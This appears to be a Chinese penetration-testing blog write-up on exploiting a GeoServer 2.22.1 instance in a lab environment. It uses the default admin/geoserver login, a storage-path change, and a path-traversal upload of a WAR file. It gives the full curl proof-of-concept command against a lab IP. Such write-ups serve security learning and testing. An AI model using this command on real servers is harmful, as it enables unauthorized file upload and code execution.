前言
在演练内网碰到了一台geoserver,记忆中貌似只有个弱口令,登上去就不管了。好奇心驱使下查了,发现有后台文件上传漏洞,至于版本没研究,索性搭了一台和目标一样的geoserver环境。
环境搭建
下载链接,并且需要jdk8,安装直接默认下一步到底。
https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/GeoServer-2.22.1-winsetup.exe/download
如果直接返回根目录是这样的,很多geoserver基本都会这样列出来,这个到后面会有用。
利用过程
弱口令
admin/geoserver弱口令进来,访问到存储仓库。
存储仓库
如果没有仓库需要手动创建,ImageMosaic类型的。
默认仓库会带有这个东西,点进去。
这里原来是相对路径,我们需要把他修改为绝对路径。
绝对路径
数据目录
如何找绝对路径呢?登录进来,点服务器状态就行。
webapps
这个路径也需要找,为后面的任意文件上传做准备。
回到存储仓库点浏览
接下来就自己翻了,翻到webapps目录。
我这里是在这里,毕竟默认安装的。
poc
通过curl发送上传文件的包
curl -vH"Content-Type:" -u"admin:geoserver" --data-binary @222.war "http://10.211.55.3:8080/geoserver/rest/workspaces/nurc/coveragestores/mosaic/file.shp?filename=../../../../../../../Program%20Files/GeoServer/webapps/222.war"war制作
简单制作过程可以参考上篇文章
